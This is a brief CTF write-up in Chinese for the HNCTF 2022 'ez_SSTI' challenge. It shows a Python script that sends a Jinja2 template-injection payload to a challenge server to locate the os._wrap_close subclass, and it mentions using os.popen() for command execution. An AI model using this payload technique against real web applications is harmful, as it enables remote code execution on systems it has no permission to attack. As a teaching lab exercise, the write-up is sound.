HNCTF 2022 WEEK2 ez_SSTI

WELCOME TO HNCTF

今天来做一下WELCOME TO HNCTF

打开题目有一个链接,打开一看,跳转到别的地方去了,测试了一下,存在ssti注入漏洞

跑出来了所有的类

我们去找我们需要用到的os模块在第几个,用脚本去跑

附跑ssti模块的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests

headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36'}
for i in range(500):
url = "http://node2.anna.nssctf.cn:28081/?name={{().__class__.__bases__[0].__subclasses__()["+str(i)+"]}}"
res = requests.get(url=url, headers=headers)
#print(res.text)
if 'os._wrap_close' in res.text: //想利用的模块名可以换
print(i)



接这里用os模块中的popen()来执行命令

总结:一些基础魔术方法的利用,未发现过滤,基础题